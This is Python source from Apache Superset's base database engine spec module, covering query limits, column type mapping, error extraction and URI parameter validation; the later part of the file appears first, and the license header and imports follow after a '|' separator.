return dict(
sorted(
time_grain_expressions.items(),
key=lambda x: (
cls._sort_time_grains(x, 0),
cls._sort_time_grains(x, 1),
cls._sort_time_grains(x, 2),
cls._sort_time_grains(x, 3),
),
)
)
@classmethod
def fetch_data(
cls, cursor: Any, limit: Optional[int] = None
) -> List[Tuple[Any, ...]]:
"""
:param cursor: Cursor instance
:param limit: Maximum number of rows to be returned by the cursor
:return: Result of query
"""
if cls.arraysize:
cursor.arraysize = cls.arraysize
try:
if cls.limit_method == LimitMethod.FETCH_MANY and limit:
return cursor.fetchmany(limit)
return cursor.fetchall()
except Exception as ex:
raise cls.get_dbapi_mapped_exception(ex)
@classmethod
def expand_data(
cls, columns: List[Dict[Any, Any]], data: List[Dict[Any, Any]]
) -> Tuple[List[Dict[Any, Any]], List[Dict[Any, Any]], List[Dict[Any, Any]]]:
"""
Some engines support expanding nested fields. See implementation in Presto
spec for details.
:param columns: columns selected in the query
:param data: original data set
:return: list of all columns(selected columns and their nested fields),
expanded data set, listed of nested fields
"""
return columns, data, []
@classmethod
def alter_new_orm_column(cls, orm_col: "TableColumn") -> None:
"""Allow altering default column attributes when first detected/added
For instance special column like `__time` for Druid can be
set to is_dttm=True. Note that this only gets called when new
columns are detected/created"""
# TODO: Fix circular import caused by importing TableColumn
@classmethod
def epoch_to_dttm(cls) -> str:
"""
SQL expression that converts epoch (seconds) to datetime that can be used in a
query. The reference column should be denoted as `{col}` in the return
expression, e.g. "FROM_UNIXTIME({col})"
:return: SQL Expression
"""
raise NotImplementedError()
@classmethod
def epoch_ms_to_dttm(cls) -> str:
"""
SQL expression that converts epoch (milliseconds) to datetime that can be used
in a query.
:return: SQL Expression
"""
return cls.epoch_to_dttm().replace("{col}", "({col}/1000)")
@classmethod
def get_datatype(cls, type_code: Any) -> Optional[str]:
"""
Change column type code from cursor description to string representation.
:param type_code: Type code from cursor description
:return: String representation of type code
"""
if isinstance(type_code, str) and type_code != "":
return type_code.upper()
return None
@classmethod
def normalize_indexes(cls, indexes: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""
Normalizes indexes for more consistency across db engines
noop by default
:param indexes: Raw indexes as returned by SQLAlchemy
:return: cleaner, more aligned index definition
"""
return indexes
@classmethod
def extra_table_metadata( # pylint: disable=unused-argument
cls, database: "Database", table_name: str, schema_name: str,
) -> Dict[str, Any]:
"""
Returns engine-specific table metadata
:param database: Database instance
:param table_name: Table name
:param schema_name: Schema name
:return: Engine-specific table metadata
"""
# TODO: Fix circular import caused by importing Database
return {}
@classmethod
def apply_limit_to_sql(
cls, sql: str, limit: int, database: "Database", force: bool = False
) -> str:
"""
Alters the SQL statement to apply a LIMIT clause
:param sql: SQL query
:param limit: Maximum number of rows to be returned by the query
:param database: Database instance
:return: SQL query with limit clause
"""
# TODO: Fix circular import caused by importing Database
if cls.limit_method == LimitMethod.WRAP_SQL:
sql = sql.strip("\t\n ;")
qry = (
select("*")
.select_from(TextAsFrom(text(sql), ["*"]).alias("inner_qry"))
.limit(limit)
)
return database.compile_sqla_query(qry)
if cls.limit_method == LimitMethod.FORCE_LIMIT:
parsed_query = sql_parse.ParsedQuery(sql)
sql = parsed_query.set_or_update_query_limit(limit, force=force)
return sql
@classmethod
def get_limit_from_sql(cls, sql: str) -> Optional[int]:
"""
Extract limit from SQL query
:param sql: SQL query
:return: Value of limit clause in query
"""
parsed_query = sql_parse.ParsedQuery(sql)
return parsed_query.limit
@classmethod
def set_or_update_query_limit(cls, sql: str, limit: int) -> str:
"""
Create a query based on original query but with new limit clause
:param sql: SQL query
:param limit: New limit to insert/replace into query
:return: Query with new limit
"""
parsed_query = sql_parse.ParsedQuery(sql)
return parsed_query.set_or_update_query_limit(limit)
@classmethod
def df_to_sql(
cls,
database: "Database",
table: Table,
df: pd.DataFrame,
to_sql_kwargs: Dict[str, Any],
) -> None:
"""
Upload data from a Pandas DataFrame to a database.
For regular engines this calls the `pandas.DataFrame.to_sql` method. Can be
overridden for engines that don't work well with this method, e.g. Hive and
BigQuery.
Note this method does not create metadata for the table.
:param database: The database to upload the data to
:param table: The table to upload the data to
:param df: The dataframe with data to be uploaded
:param to_sql_kwargs: The kwargs to be passed to pandas.DataFrame.to_sql` method
"""
engine = cls.get_engine(database)
to_sql_kwargs["name"] = table.table
if table.schema:
# Only add schema when it is preset and non empty.
to_sql_kwargs["schema"] = table.schema
if engine.dialect.supports_multivalues_insert:
to_sql_kwargs["method"] = "multi"
df.to_sql(con=engine, **to_sql_kwargs)
@classmethod
def convert_dttm( # pylint: disable=unused-argument
cls, target_type: str, dttm: datetime, db_extra: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Convert Python datetime object to a SQL expression
:param target_type: The target type of expression
:param dttm: The datetime object
:param db_extra: The database extra object
:return: The SQL expression
"""
return None
@classmethod
def get_all_datasource_names(
cls, database: "Database", datasource_type: str
) -> List[utils.DatasourceName]:
"""Returns a list of all tables or views in database.
:param database: Database instance
:param datasource_type: Datasource_type can be 'table' or 'view'
:return: List of all datasources in database or schema
"""
# TODO: Fix circular import caused by importing Database
schemas = database.get_all_schema_names(
cache=database.schema_cache_enabled,
cache_timeout=database.schema_cache_timeout,
force=True,
)
all_datasources: List[utils.DatasourceName] = []
for schema in schemas:
if datasource_type == "table":
all_datasources += database.get_all_table_names_in_schema(
schema=schema,
force=True,
cache=database.table_cache_enabled,
cache_timeout=database.table_cache_timeout,
)
elif datasource_type == "view":
all_datasources += database.get_all_view_names_in_schema(
schema=schema,
force=True,
cache=database.table_cache_enabled,
cache_timeout=database.table_cache_timeout,
)
else:
raise Exception(f"Unsupported datasource_type: {datasource_type}")
return all_datasources
@classmethod
def handle_cursor(cls, cursor: Any, query: Query, session: Session) -> None:
"""Handle a live cursor between the execute and fetchall calls
The flow works without this method doing anything, but it allows
for handling the cursor and updating progress information in the
query object"""
# TODO: Fix circular import error caused by importing sql_lab.Query
@classmethod
def extract_error_message(cls, ex: Exception) -> str:
return f"{cls.engine} error: {cls._extract_error_message(ex)}"
@classmethod
def _extract_error_message(cls, ex: Exception) -> str:
"""Extract error message for queries"""
return utils.error_msg_from_exception(ex)
@classmethod
def extract_errors(
cls, ex: Exception, context: Optional[Dict[str, Any]] = None
) -> List[SupersetError]:
raw_message = cls._extract_error_message(ex)
context = context or {}
for regex, (message, error_type, extra) in cls.custom_errors.items():
match = regex.search(raw_message)
if match:
params = {**context, **match.groupdict()}
extra["engine_name"] = cls.engine_name
return [
SupersetError(
error_type=error_type,
message=message % params,
level=ErrorLevel.ERROR,
extra=extra,
)
]
return [
SupersetError(
error_type=SupersetErrorType.GENERIC_DB_ENGINE_ERROR,
message=cls._extract_error_message(ex),
level=ErrorLevel.ERROR,
extra={"engine_name": cls.engine_name},
)
]
@classmethod
def adjust_database_uri(cls, uri: URL, selected_schema: Optional[str]) -> None:
"""
Mutate the database component of the SQLAlchemy URI.
The URI here represents the URI as entered when saving the database,
``selected_schema`` is the schema currently active presumably in
the SQL Lab dropdown. Based on that, for some database engine,
we can return a new altered URI that connects straight to the
active schema, meaning the users won't have to prefix the object
names by the schema name.
Some databases engines have 2 level of namespacing: database and
schema (postgres, oracle, mssql, ...)
For those it's probably better to not alter the database
component of the URI with the schema name, it won't work.
Some database drivers like presto accept '{catalog}/{schema}' in
the database component of the URL, that can be handled here.
"""
@classmethod
def patch(cls) -> None:
"""
TODO: Improve docstring and refactor implementation in Hive
"""
@classmethod
def get_schema_names(cls, inspector: Inspector) -> List[str]:
"""
Get all schemas from database
:param inspector: SqlAlchemy inspector
:return: All schemas in the database
"""
return sorted(inspector.get_schema_names())
@classmethod
def get_table_names( # pylint: disable=unused-argument
cls, database: "Database", inspector: Inspector, schema: Optional[str],
) -> List[str]:
"""
Get all tables from schema
:param database: The database to get info
:param inspector: SqlAlchemy inspector
:param schema: Schema to inspect. If omitted, uses default schema for database
:return: All tables in schema
"""
tables = inspector.get_table_names(schema)
if schema and cls.try_remove_schema_from_table_name:
tables = [re.sub(f"^{schema}\\.", "", table) for table in tables]
return sorted(tables)
@classmethod
def get_view_names( # pylint: disable=unused-argument
cls, database: "Database", inspector: Inspector, schema: Optional[str],
) -> List[str]:
"""
Get all views from schema
:param database: The database to get info
:param inspector: SqlAlchemy inspector
:param schema: Schema name. If omitted, uses default schema for database
:return: All views in schema
"""
views = inspector.get_view_names(schema)
if schema and cls.try_remove_schema_from_table_name:
views = [re.sub(f"^{schema}\\.", "", view) for view in views]
return sorted(views)
@classmethod
def get_table_comment(
cls, inspector: Inspector, table_name: str, schema: Optional[str]
) -> Optional[str]:
"""
Get comment of table from a given schema and table
:param inspector: SqlAlchemy Inspector instance
:param table_name: Table name
:param schema: Schema name. If omitted, uses default schema for database
:return: comment of table
"""
comment = None
try:
comment = inspector.get_table_comment(table_name, schema)
comment = comment.get("text") if isinstance(comment, dict) else None
except NotImplementedError:
# It's expected that some dialects don't implement the comment method
pass
except Exception as ex: # pylint: disable=broad-except
logger.error("Unexpected error while fetching table comment", exc_info=True)
logger.exception(ex)
return comment
@classmethod
def get_columns(
cls, inspector: Inspector, table_name: str, schema: Optional[str]
) -> List[Dict[str, Any]]:
"""
Get all columns from a given schema and table
:param inspector: SqlAlchemy Inspector instance
:param table_name: Table name
:param schema: Schema name. If omitted, uses default schema for database
:return: All columns in table
"""
return inspector.get_columns(table_name, schema)
@classmethod
def where_latest_partition( # pylint: disable=too-many-arguments,unused-argument
cls,
table_name: str,
schema: Optional[str],
database: "Database",
query: Select,
columns: Optional[List[Dict[str, str]]] = None,
) -> Optional[Select]:
"""
Add a where clause to a query to reference only the most recent partition
:param table_name: Table name
:param schema: Schema name
:param database: Database instance
:param query: SqlAlchemy query
:param columns: List of TableColumns
:return: SqlAlchemy query with additional where clause referencing the latest
partition
"""
# TODO: Fix circular import caused by importing Database, TableColumn
return None
@classmethod
def _get_fields(cls, cols: List[Dict[str, Any]]) -> List[Any]:
return [column(c["name"]) for c in cols]
@classmethod
def select_star( # pylint: disable=too-many-arguments,too-many-locals
cls,
database: "Database",
table_name: str,
engine: Engine,
schema: Optional[str] = None,
limit: int = 100,
show_cols: bool = False,
indent: bool = True,
latest_partition: bool = True,
cols: Optional[List[Dict[str, Any]]] = None,
) -> str:
"""
Generate a "SELECT * from [schema.]table_name" query with appropriate limit.
WARNING: expects only unquoted table and schema names.
:param database: Database instance
:param table_name: Table name, unquoted
:param engine: SqlAlchemy Engine instance
:param schema: Schema, unquoted
:param limit: limit to impose on query
:param show_cols: Show columns in query; otherwise use "*"
:param indent: Add indentation to query
:param latest_partition: Only query the latest partition
:param cols: Columns to include in query
:return: SQL query
"""
# pylint: disable=redefined-outer-name
fields: Union[str, List[Any]] = "*"
cols = cols or []
if (show_cols or latest_partition) and not cols:
cols = database.get_columns(table_name, schema)
if show_cols:
fields = cls._get_fields(cols)
quote = engine.dialect.identifier_preparer.quote
if schema:
full_table_name = quote(schema) + "." + quote(table_name)
else:
full_table_name = quote(table_name)
qry = select(fields).select_from(text(full_table_name))
if limit:
qry = qry.limit(limit)
if latest_partition:
partition_query = cls.where_latest_partition(
table_name, schema, database, qry, columns=cols
)
if partition_query is not None:
qry = partition_query
sql = database.compile_sqla_query(qry)
if indent:
sql = sqlparse.format(sql, reindent=True)
return sql
@classmethod
def estimate_statement_cost(cls, statement: str, cursor: Any) -> Dict[str, Any]:
"""
Generate a SQL query that estimates the cost of a given statement.
:param statement: A single SQL statement
:param cursor: Cursor instance
:return: Dictionary with different costs
"""
raise Exception("Database does not support cost estimation")
@classmethod
def query_cost_formatter(
cls, raw_cost: List[Dict[str, Any]]
) -> List[Dict[str, str]]:
"""
Format cost estimate.
:param raw_cost: Raw estimate from `estimate_query_cost`
:return: Human readable cost estimate
"""
raise Exception("Database does not support cost estimation")
@classmethod
def process_statement(
cls, statement: str, database: "Database", user_name: str
) -> str:
"""
Process a SQL statement by stripping and mutating it.
:param statement: A single SQL statement
:param database: Database instance
:param user_name: Effective username
:return: Dictionary with different costs
"""
parsed_query = ParsedQuery(statement)
sql = parsed_query.stripped()
sql_query_mutator = current_app.config["SQL_QUERY_MUTATOR"]
if sql_query_mutator:
sql = sql_query_mutator(sql, user_name, security_manager, database)
return sql
@classmethod
def estimate_query_cost(
cls,
database: "Database",
schema: str,
sql: str,
source: Optional[utils.QuerySource] = None,
) -> List[Dict[str, Any]]:
"""
Estimate the cost of a multiple statement SQL query.
:param database: Database instance
:param schema: Database schema
:param sql: SQL query with possibly multiple statements
:param source: Source of the query (eg, "sql_lab")
"""
extra = database.get_extra() or {}
if not cls.get_allow_cost_estimate(extra):
raise Exception("Database does not support cost estimation")
user_name = g.user.username if g.user and hasattr(g.user, "username") else None
parsed_query = sql_parse.ParsedQuery(sql)
statements = parsed_query.get_statements()
engine = cls.get_engine(database, schema=schema, source=source)
costs = []
with closing(engine.raw_connection()) as conn:
cursor = conn.cursor()
for statement in statements:
processed_statement = cls.process_statement(
statement, database, user_name
)
costs.append(cls.estimate_statement_cost(processed_statement, cursor))
return costs
@classmethod
def modify_url_for_impersonation(
cls, url: URL, impersonate_user: bool, username: Optional[str]
) -> None:
"""
Modify the SQL Alchemy URL object with the user to impersonate if applicable.
:param url: SQLAlchemy URL object
:param impersonate_user: Flag indicating if impersonation is enabled
:param username: Effective username
"""
if impersonate_user and username is not None:
url.username = username
@classmethod
def update_impersonation_config(
cls, connect_args: Dict[str, Any], uri: str, username: Optional[str],
) -> None:
"""
Update a configuration dictionary
that can set the correct properties for impersonating users
:param connect_args: config to be updated
:param uri: URI
:param username: Effective username
:return: None
"""
@classmethod
def execute( # pylint: disable=unused-argument
cls, cursor: Any, query: str, **kwargs: Any,
) -> None:
"""
Execute a SQL query
:param cursor: Cursor instance
:param query: Query to execute
:param kwargs: kwargs to be passed to cursor.execute()
:return:
"""
if not cls.allows_sql_comments:
query = sql_parse.strip_comments_from_sql(query)
if cls.arraysize:
cursor.arraysize = cls.arraysize
try:
cursor.execute(query)
except Exception as ex:
raise cls.get_dbapi_mapped_exception(ex)
@classmethod
def make_label_compatible(cls, label: str) -> Union[str, quoted_name]:
"""
Conditionally mutate and/or quote a sqlalchemy expression label. If
force_column_alias_quotes is set to True, return the label as a
sqlalchemy.sql.elements.quoted_name object to ensure that the select query
and query results have same case. Otherwise, return the mutated label as a
regular string. If maximum supported column name length is exceeded,
generate a truncated label by calling truncate_label().
:param label: expected expression label/alias
:return: conditionally mutated label supported by the db engine
"""
label_mutated = cls._mutate_label(label)
if (
cls.max_column_name_length
and len(label_mutated) > cls.max_column_name_length
):
label_mutated = cls._truncate_label(label)
if cls.force_column_alias_quotes:
label_mutated = quoted_name(label_mutated, True)
return label_mutated
@classmethod
def get_sqla_column_type(
cls,
column_type: Optional[str],
column_type_mappings: Tuple[ColumnTypeMapping, ...] = column_type_mappings,
) -> Optional[Tuple[TypeEngine, GenericDataType]]:
"""
Return a sqlalchemy native column type that corresponds to the column type
defined in the data source (return None to use default type inferred by
SQLAlchemy). Override `column_type_mappings` for specific needs
(see MSSQL for example of NCHAR/NVARCHAR handling).
:param column_type: Column type returned by inspector
:param column_type_mappings: Maps from string to SqlAlchemy TypeEngine
:return: SqlAlchemy column type
"""
if not column_type:
return None
for regex, sqla_type, generic_type in column_type_mappings:
match = regex.match(column_type)
if not match:
continue
if callable(sqla_type):
return sqla_type(match), generic_type
return sqla_type, generic_type
return None
@staticmethod
def _mutate_label(label: str) -> str:
"""
Most engines support mixed case aliases that can include numbers
and special characters, like commas, parentheses etc. For engines that
have restrictions on what types of aliases are supported, this method
can be overridden to ensure that labels conform to the engine's
limitations. Mutated labels should be deterministic (input label A always
yields output label X) and unique (input labels A and B don't yield the same
output label X).
:param label: Preferred expression label
:return: Conditionally mutated label
"""
return label
@classmethod
def _truncate_label(cls, label: str) -> str:
"""
In the case that a label exceeds the max length supported by the engine,
this method is used to construct a deterministic and unique label based on
the original label. By default, this returns a md5 hash of the original label,
conditionally truncated if the length of the hash exceeds the max column length
of the engine.
:param label: Expected expression label
:return: Truncated label
"""
label = md5_sha_from_str(label)
# truncate hash if it exceeds max length
if cls.max_column_name_length and len(label) > cls.max_column_name_length:
label = label[: cls.max_column_name_length]
return label
@classmethod
def column_datatype_to_string(
cls, sqla_column_type: TypeEngine, dialect: Dialect
) -> str:
"""
Convert sqlalchemy column type to string representation.
By default, removes collation and character encoding info to avoid
unnecessarily long datatypes.
:param sqla_column_type: SqlAlchemy column type
:param dialect: Sqlalchemy dialect
:return: Compiled column type
"""
sqla_column_type = sqla_column_type.copy()
if hasattr(sqla_column_type, "collation"):
sqla_column_type.collation = None
if hasattr(sqla_column_type, "charset"):
sqla_column_type.charset = None
return sqla_column_type.compile(dialect=dialect).upper()
@classmethod
def get_function_names( # pylint: disable=unused-argument
cls, database: "Database",
) -> List[str]:
"""
Get a list of function names that are able to be called on the database.
Used for SQL Lab autocomplete.
:param database: The database to get functions for
:return: A list of function names useable in the database
"""
return []
@staticmethod
def pyodbc_rows_to_tuples(data: List[Any]) -> List[Tuple[Any, ...]]:
"""
Convert pyodbc.Row objects from `fetch_data` to tuples.
:param data: List of tuples or pyodbc.Row objects
:return: List of tuples
"""
if data and type(data[0]).__name__ == "Row":
data = [tuple(row) for row in data]
return data
@staticmethod
def mutate_db_for_connection_test( # pylint: disable=unused-argument
database: "Database",
) -> None:
"""
Some databases require passing additional parameters for validating database
connections. This method makes it possible to mutate the database instance prior
to testing if a connection is ok.
:param database: instance to be mutated
"""
return None
@staticmethod
def get_extra_params(database: "Database") -> Dict[str, Any]:
"""
Some databases require adding elements to connection parameters,
like passing certificates to `extra`. This can be done here.
:param database: database instance from which to extract extras
:raises CertificateException: If certificate is not valid/unparseable
"""
extra: Dict[str, Any] = {}
if database.extra:
try:
extra = json.loads(database.extra)
except json.JSONDecodeError as ex:
logger.error(ex, exc_info=True)
raise ex
return extra
@staticmethod
def update_encrypted_extra_params(
database: "Database", params: Dict[str, Any]
) -> None:
"""
Some databases require some sensitive information which do not conform to
the username:password syntax normally used by SQLAlchemy.
:param database: database instance from which to extract extras
:param params: params to be updated
"""
if not database.encrypted_extra:
return
try:
encrypted_extra = json.loads(database.encrypted_extra)
params.update(encrypted_extra)
except json.JSONDecodeError as ex:
logger.error(ex, exc_info=True)
raise ex
@classmethod
def is_readonly_query(cls, parsed_query: ParsedQuery) -> bool:
"""Pessimistic readonly, 100% sure statement won't mutate anything"""
return (
parsed_query.is_select()
or parsed_query.is_explain()
or parsed_query.is_show()
)
@classmethod
def is_select_query(cls, parsed_query: ParsedQuery) -> bool:
"""
Determine if the statement should be considered as SELECT statement.
Some query dialects do not contain "SELECT" word in queries (eg. Kusto)
"""
return parsed_query.is_select()
@classmethod
def get_column_spec( # pylint: disable=unused-argument
cls,
native_type: Optional[str],
db_extra: Optional[Dict[str, Any]] = None,
source: utils.ColumnTypeSource = utils.ColumnTypeSource.GET_TABLE,
column_type_mappings: Tuple[ColumnTypeMapping, ...] = column_type_mappings,
) -> Optional[ColumnSpec]:
"""
Converts native database type to sqlalchemy column type.
:param native_type: Native database type
:param db_extra: The database extra object
:param source: Type coming from the database table or cursor description
:param column_type_mappings: Maps from string to SqlAlchemy TypeEngine
:return: ColumnSpec object
"""
col_types = cls.get_sqla_column_type(
native_type, column_type_mappings=column_type_mappings
)
if col_types:
column_type, generic_type = col_types
# wrap temporal types in custom type that supports literal binding
# using datetimes
if generic_type == GenericDataType.TEMPORAL:
column_type = literal_dttm_type_factory(
column_type, cls, native_type or "", db_extra=db_extra or {}
)
is_dttm = generic_type == GenericDataType.TEMPORAL
return ColumnSpec(
sqla_type=column_type, generic_type=generic_type, is_dttm=is_dttm
)
return None
@classmethod
def has_implicit_cancel(cls) -> bool:
"""
Return True if the live cursor handles the implicit cancelation of the query,
False otherise.
:return: Whether the live cursor implicitly cancels the query
:see: handle_cursor
"""
return False
@classmethod
def get_cancel_query_id( # pylint: disable=unused-argument
cls, cursor: Any, query: Query,
) -> Optional[str]:
"""
Select identifiers from the database engine that uniquely identifies the
queries to cancel. The identifier is typically a session id, process id
or similar.
:param cursor: Cursor instance in which the query will be executed
:param query: Query instance
:return: Query identifier
"""
return None
@classmethod
def cancel_query( # pylint: disable=unused-argument
cls, cursor: Any, query: Query, cancel_query_id: str,
) -> bool:
"""
Cancel query in the underlying database.
:param cursor: New cursor instance to the db of the query
:param query: Query instance
:param cancel_query_id: Value returned by get_cancel_query_payload or set in
other life-cycle methods of the query
:return: True if query cancelled successfully, False otherwise
"""
return False
@classmethod
def parse_sql(cls, sql: str) -> List[str]:
return [str(s).strip(" ;") for s in sqlparse.parse(sql)]
# schema for adding a database by providing parameters instead of the
# full SQLAlchemy URI
class BasicParametersSchema(Schema):
username = fields.String(required=True, allow_none=True, description=__("Username"))
password = fields.String(allow_none=True, description=__("Password"))
host = fields.String(required=True, description=__("Hostname or IP address"))
port = fields.Integer(
required=True,
description=__("Database port"),
validate=Range(min=0, max=2 ** 16, max_inclusive=False),
)
database = fields.String(required=True, description=__("Database name"))
query = fields.Dict(
keys=fields.Str(), values=fields.Raw(), description=__("Additional parameters")
)
encryption = fields.Boolean(
required=False, description=__("Use an encrypted connection to the database")
)
class BasicParametersType(TypedDict, total=False):
username: Optional[str]
password: Optional[str]
host: str
port: int
database: str
query: Dict[str, Any]
encryption: bool
class BasicParametersMixin:
"""
Mixin for configuring DB engine specs via a dictionary.
With this mixin the SQLAlchemy engine can be configured through
individual parameters, instead of the full SQLAlchemy URI. This
mixin is for the most common pattern of URI:
engine+driver://user:password@host:port/dbname[?key=value&key=value...]
"""
# schema describing the parameters used to configure the DB
parameters_schema = BasicParametersSchema()
# recommended driver name for the DB engine spec
default_driver = ""
# placeholder with the SQLAlchemy URI template
sqlalchemy_uri_placeholder = (
"engine+driver://user:password@host:port/dbname[?key=value&key=value...]"
)
# query parameter to enable encryption in the database connection
# for Postgres this would be `{"sslmode": "verify-ca"}`, eg.
encryption_parameters: Dict[str, str] = {}
@classmethod
def build_sqlalchemy_uri( # pylint: disable=unused-argument
cls,
parameters: BasicParametersType,
encryted_extra: Optional[Dict[str, str]] = None,
) -> str:
# make a copy so that we don't update the original
query = parameters.get("query", {}).copy()
if parameters.get("encryption"):
if not cls.encryption_parameters:
raise Exception("Unable to build a URL with encryption enabled")
query.update(cls.encryption_parameters)
return str(
URL(
f"{cls.engine}+{cls.default_driver}".rstrip("+"), # type: ignore
username=parameters.get("username"),
password=parameters.get("password"),
host=parameters["host"],
port=parameters["port"],
database=parameters["database"],
query=query,
)
)
@classmethod
def get_parameters_from_uri( # pylint: disable=unused-argument
cls, uri: str, encrypted_extra: Optional[Dict[str, Any]] = None
) -> BasicParametersType:
url = make_url(uri)
query = {
key: value
for (key, value) in url.query.items()
if (key, value) not in cls.encryption_parameters.items()
}
encryption = all(
item in url.query.items() for item in cls.encryption_parameters.items()
)
return {
"username": url.username,
"password": url.password,
"host": url.host,
"port": url.port,
"database": url.database,
"query": query,
"encryption": encryption,
}
@classmethod
def validate_parameters(
cls, parameters: BasicParametersType
) -> List[SupersetError]:
"""
Validates any number of parameters, for progressive validation.
If only the hostname is present it will check if the name is resolvable. As more
parameters are present in the request, more validation is done.
"""
errors: List[SupersetError] = []
required = {"host", "port", "username", "database"}
present = {key for key in parameters if parameters.get(key, ())}
missing = sorted(required - present)
if missing:
errors.append(
SupersetError(
message=f'One or more parameters are missing: {', '.join(missing)}',
error_type=SupersetErrorType.CONNECTION_MISSING_PARAMETERS_ERROR,
level=ErrorLevel.WARNING,
extra={"missing": missing},
),
)
host = parameters.get("host", None)
if not host:
return errors
if not is_hostname_valid(host):
errors.append(
SupersetError(
message="The hostname provided can't be resolved.",
error_type=SupersetErrorType.CONNECTION_INVALID_HOSTNAME_ERROR,
level=ErrorLevel.ERROR,
extra={"invalid": ["host"]},
),
)
return errors
port = parameters.get("port", None)
if not port:
return errors
try:
port = int(port)
except (ValueError, TypeError):
errors.append(
SupersetError(
message="Port must be a valid integer.",
error_type=SupersetErrorType.CONNECTION_INVALID_PORT_ERROR,
level=ErrorLevel.ERROR,
extra={"invalid": ["port"]},
),
)
if not (isinstance(port, int) and 0 <= port < 2 ** 16):
errors.append(
SupersetError(
message=(
"The port must be an integer between 0 and 65535 "
"(inclusive)."
),
error_type=SupersetErrorType.CONNECTION_INVALID_PORT_ERROR,
level=ErrorLevel.ERROR,
extra={"invalid": ["port"]},
),
)
elif not is_port_open(host, port):
errors.append(
SupersetError(
message="The port is closed.",
error_type=SupersetErrorType.CONNECTION_PORT_CLOSED_ERROR,
level=ErrorLevel.ERROR,
extra={"invalid": ["port"]},
),
)
return errors
@classmethod
def parameters_json_schema(cls) -> Any:
"""
Return configuration parameters as OpenAPI.
"""
if not cls.parameters_schema:
return None
spec = APISpec(
title="Database Parameters",
version="1.0.0",
openapi_version="3.0.2",
plugins=[MarshmallowPlugin()],
)
spec.components.schema(cls.__name__, schema=cls.parameters_schema)
return spec.to_dict()["components"]["schemas"][cls.__name__]
| # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
import json
import logging
import re
from contextlib import closing
from datetime import datetime
from typing import (
Any,
Callable,
Dict,
List,
Match,
NamedTuple,
Optional,
Pattern,
Set,
Tuple,
Type,
TYPE_CHECKING,
Union,
)
import pandas as pd
import sqlparse
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from flask import current_app, g
from flask_babel import gettext as __, lazy_gettext as _
from marshmallow import fields, Schema
from marshmallow.validate import Range
from sqlalchemy import column, select, types
from sqlalchemy.engine.base import Engine
from sqlalchemy.engine.interfaces import Compiled, Dialect
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.engine.url import make_url, URL
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.orm import Session
from sqlalchemy.sql import quoted_name, text
from sqlalchemy.sql.expression import ColumnClause, Select, TextAsFrom, TextClause
from sqlalchemy.types import TypeEngine
from typing_extensions import TypedDict
from superset import security_manager, sql_parse
from superset.errors import ErrorLevel, SupersetError, SupersetErrorType
from superset.models.sql_lab import Query
from superset.models.sql_types.base import literal_dttm_type_factory
from superset.sql_parse import ParsedQuery, Table
from superset.utils import core as utils
from superset.utils.core import ColumnSpec, GenericDataType
from superset.utils.hashing import md5_sha_from_str
from superset.utils.network import is_hostname_valid, is_port_open
if TYPE_CHECKING:
# prevent circular imports
from superset.connectors.sqla.models import TableColumn
from superset.models.core import Database
ColumnTypeMapping = Tuple[
Pattern[str],
Union[TypeEngine, Callable[[Match[str]], TypeEngine]],
GenericDataType,
]
logger = logging.getLogger()
class TimeGrain(NamedTuple):
name: str # TODO: redundant field, remove
label: str
function: str
duration: Optional[str]
builtin_time_grains: Dict[Optional[str], str] = {
None: __("Original value"),
"PT1S": __("Second"),
"PT5S": __("5 second"),
"PT30S": __("30 second"),
"PT1M": __("Minute"),
"PT5M": __("5 minute"),
"PT10M": __("10 minute"),
"PT15M": __("15 minute"),
"PT30M": __("30 minute"),
"PT1H": __("Hour"),
"PT6H": __("6 hour"),
"P1D": __("Day"),
"P1W": __("Week"),
"P1M": __("Month"),
"P3M": __("Quarter"),
"P1Y": __("Year"),
"1969-12-28T00:00:00Z/P1W": __("Week starting Sunday"),
"1969-12-29T00:00:00Z/P1W": __("Week starting Monday"),
"P1W/1970-01-03T00:00:00Z": __("Week ending Saturday"),
"P1W/1970-01-04T00:00:00Z": __("Week_ending Sunday"),
}
class TimestampExpression(ColumnClause): # pylint: disable=abstract-method
def __init__(self, expr: str, col: ColumnClause, **kwargs: Any) -> None:
"""Sqlalchemy class that can be can be used to render native column elements
respeting engine-specific quoting rules as part of a string-based expression.
:param expr: Sql expression with '{col}' denoting the locations where the col
object will be rendered.
:param col: the target column
"""
super().__init__(expr, **kwargs)
self.col = col
@property
def _constructor(self) -> ColumnClause:
# Needed to ensure that the column label is rendered correctly when
# proxied to the outer query.
# See https://github.com/sqlalchemy/sqlalchemy/issues/4730
return ColumnClause
@compiles(TimestampExpression)
def compile_timegrain_expression(
element: TimestampExpression, compiler: Compiled, **kwargs: Any
) -> str:
return element.name.replace("{col}", compiler.process(element.col, **kwargs))
class LimitMethod: # pylint: disable=too-few-public-methods
"""Enum the ways that limits can be applied"""
FETCH_MANY = "fetch_many"
WRAP_SQL = "wrap_sql"
FORCE_LIMIT = "force_limit"
class BaseEngineSpec: # pylint: disable=too-many-public-methods
"""Abstract class for database engine specific configurations
Attributes:
allows_alias_to_source_column: Whether the engine is able to pick the
source column for aggregation clauses
used in ORDER BY when a column in SELECT
has an alias that is the same as a source
column.
allows_hidden_orderby_agg: Whether the engine allows ORDER BY to
directly use aggregation clauses, without
having to add the same aggregation in SELECT.
"""
engine = "base" # str as defined in sqlalchemy.engine.engine
engine_aliases: Set[str] = set()
engine_name: Optional[str] = None # for user messages, overridden in child classes
_date_trunc_functions: Dict[str, str] = {}
_time_grain_expressions: Dict[Optional[str], str] = {}
column_type_mappings: Tuple[ColumnTypeMapping, ...] = (
(
re.compile(r"^string", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
re.compile(r"^n((var)?char|text)", re.IGNORECASE),
types.UnicodeText(),
GenericDataType.STRING,
),
(
re.compile(r"^(var)?char", re.IGNORECASE),
types.String(),
GenericDataType.STRING,
),
(
